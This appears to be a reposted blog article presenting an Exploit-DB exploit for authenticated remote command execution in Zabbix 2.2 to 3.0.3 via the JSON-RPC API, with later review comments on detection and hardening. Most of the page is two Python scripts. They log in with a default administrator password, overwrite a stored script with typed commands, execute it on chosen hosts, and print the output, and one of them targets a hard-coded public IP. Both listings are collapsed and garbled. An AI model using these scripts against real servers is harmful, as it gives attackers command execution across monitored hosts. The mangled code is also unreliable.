Vulnerability Source: https://www.exploit-db.com/exploits/39937/
Attack cost: High
Risk level: Low (a valid account password is required)
Preconditions: login as a high-privileged user is required
Affected versions: 2.2 < 3.0.3
Tips
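This issue requires the password of a high-privileged account. With that password, commands can also be executed by logging in to the web administration back end; using the JSON-RPC API is the second route. In other words, nothing here bypasses authentication: the exposure is the administrative credential and the permission to edit and run scripts.
The exploit script below is incomplete because the HostID is not obtained automatically.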
# NOTE(review): this listing was collapsed onto a single line and its text was
# altered in transit (capitalisation of identifiers and JSON keys changed,
# spaces inserted inside string literals, a stray "&nbsP;" entity), so it is
# not valid Python as shown. It is kept verbatim below.
#
# What the visible code does: it posts a User.login request to
# api_jsonrpc.php with a hard-coded account and keeps the returned auth token.
# It then loops: each line read from the prompt is written into the "command"
# field of script id 1 through Script.update, that script is run on the
# hard-coded host id through Script.execute, and the "value" field of the
# reply is printed.
#
# Defensive reading:
#  - Every request after the login carries the token from a successful
#    User.login, so this is use of an administrative feature, not an
#    authentication bypass. The controls that matter are the strength of the
#    administrative credential and who holds permission to edit scripts.
#  - The account name and password in the listing look like the product's
#    default administrator login (confirm against your installation); a
#    default that was never changed satisfies the precondition.
#  - Limit which networks can reach api_jsonrpc.php.
#  - Detection: a Script.update on an existing script followed at once by
#    Script.execute, repeated from one API session, is the pattern this loop
#    produces. The listing never restores script id 1, so an unexpected
#    command left in that script is an artifact worth checking for.
#!/usr/bin/env python# -*- coding: utf-8 -*-# exploit title: zabbix RCE with API JSON-RPC# Date: 06-06-2016# Exploit Author: alexander gurin# vendor homepage: http://www.zabbix.com# software link: Http://www.zabbix.com/download.php# Version: 2.2 - 3.0.3# Tested on: Linux (Debian, centos) # cve : n/aimport requestsimport jsonimport readlinezabix_root = ' http://192.168.66.2 ' ### zabbix ip-address url = zabix_root + '/api_jsonrpc.php ' ### don ' t editlogin = ' Admin ' ### zabbix login account password = ' Zabbix ' ### zabbix password password hostid = ' 10084 ' ### zabbix hostid need to specify the host of the command ### Authpayload = { &nbsP; " Jsonrpc " : " 2.0 ", " method " : " User.login ", " Params ": { ' user ': " "+login+" ", ' Password ': " "+ Password+ "", }, "auth" : None, "id" : 0,}headers = { ' Content-type ': ' Application/json ',}auth = requests.post (Url, data=json.dumps (payload), headers= (headers)) auth = Auth.json () while true:cmd = raw_input (' \033[41m[zabbix_cmd]>>: \033[0m ') if cmd == " : print " Result of last command: "if cmd == "Quit" : break### updatepayload = {"Jsonrpc": "2.0", "Method": " Script.update "," params ": { " Scriptid ": " 1 ", " command ": "+cmd+" "}," Auth " : auth[' result '], "id" : 0,}cmd_upd = requests.post (url, data=json.dumps (payload ), headers= (headers)) ### executepayload = {"Jsonrpc": "2.0", "Method": " Script.execute "," params ": { " Scriptid ": " 1 ", " HostID ": "+hostid+" "}," auth " : auth[' result ']," id " : 0,}cmd_exe = requests.post ( Url, data=json.dumps (payload), headers= (headers)) Cmd_exe = cmd_exe.json () print cmd_ exe["Result" ["value"]
Modified version that retrieves the HostID automatically:
# NOTE(review): like the listing above it on this page, this one was collapsed
# onto a single line and its text was altered in transit (capitalisation
# changed, spaces inserted inside literals, mismatched quotes, a malformed URL
# scheme), so it is not valid Python as shown. The password literal was
# rewritten by an e-mail obfuscation filter ("[email protected]") and cannot be
# recovered from this page. The listing is kept verbatim below.
#
# What the visible code does: it logs in through User.login and keeps the
# auth token, calls Host.get asking for the HostID and name fields, prints
# the returned hosts, and prompts for one host id. From there it runs the
# same loop as the first listing: Script.update writes the typed line into
# the "command" field of script id 1, Script.execute runs that script on the
# chosen host, and the "value" field of the reply is printed. The quit check
# appears twice, at the top and at the bottom of the loop.
#
# Defensive reading:
#  - All calls are authenticated with the token from User.login; the
#    precondition is an account allowed to edit and execute scripts.
#  - Detection: a Host.get enumeration followed by repeated
#    Script.update / Script.execute pairs on the same script id from a single
#    API session matches this flow.
#  - Script id 1 is overwritten and never restored by the listing, so an
#    unexpected command stored in that script is a check for incident review.
#!/usr/bin/env python2.7#coding=utf-8import jsonimport requestsurl = "/http 42.62.97.87/api_jsonrpc.php "header = {" Content-type ": " Application/json "}username = " Admin ' password = ' [email protected]# ' #get auth idpayload = { "Jsonrpc" : "2.0", "method" : "User.login", "params": { ' user ': "" +username+ "", ' password ': "+password+" ", }, "auth" : None, "id" : 0,}headers = { ' Content-type ': ' Application/json ',}auth = requests.post (URL, data=json.dumps (payload), headers= (headers)) Auth = auth.json () #get hostiddata = { "Jsonrpc ":" 2.0 ", " method ":" Host.get ", " params ":{ "Output": ["HostID", "name"], "Filter": {"host": "} }, " auth ":" "+auth[' result ']+" ", "id": 1,}hostid = requests.post (Url, data=json.dumps (data), headers= ( Headers) Hostid = hostid.json () print ' uid\tname ' for hid in hostid[' result ']: print hid[' HostID '],hid[' name '] #exec commandhostid = raw_input (' \033[41m[input_hostid]> >: \033[0m ') while true: cmd = raw_input (' \033[41m[zabbix_ cmd]>>: \033[0m ') if cmd == " : print " Result of last command: " if cmd == " quit : break ### update payload = { "Jsonrpc": "2.0", "Method": "Script.update", "params": { " Scriptid ": " 1 ", " command ": " " +cmd+ "" }, "auth " : auth[' result '], " id " : 0, } cmd_upd = requests.post (Url, data=json.dumps (payload ), headers= (headers)) ### execute payload = { "Jsonrpc": "2.0", " Method ": " Script.exeCute ", " params ": { "Scriptid": "1", "HostID": "+hostid+" " }, "auth" : auth[' result '], "id" : 0, } cmd_exe = requests.post (Url, data=json.dumps (payload), headers= (headers)) cmd_exe = cmd_exe.json () print cmd_exe["Result" ["Value"] if cmd == ' Quit ': break
![Zabbix-rpc.png](http://s5.51cto.com/wyfs02/M01/86/1F/wKiom1e1ZBPQJ-DnAABWBiMB9hs167.png)
This article is from the "Sanr" blog, make sure to keep this source http://0x007.blog.51cto.com/6330498/1839957
Zabbix 2.2 < 3.0.3-rce with API Json-rpc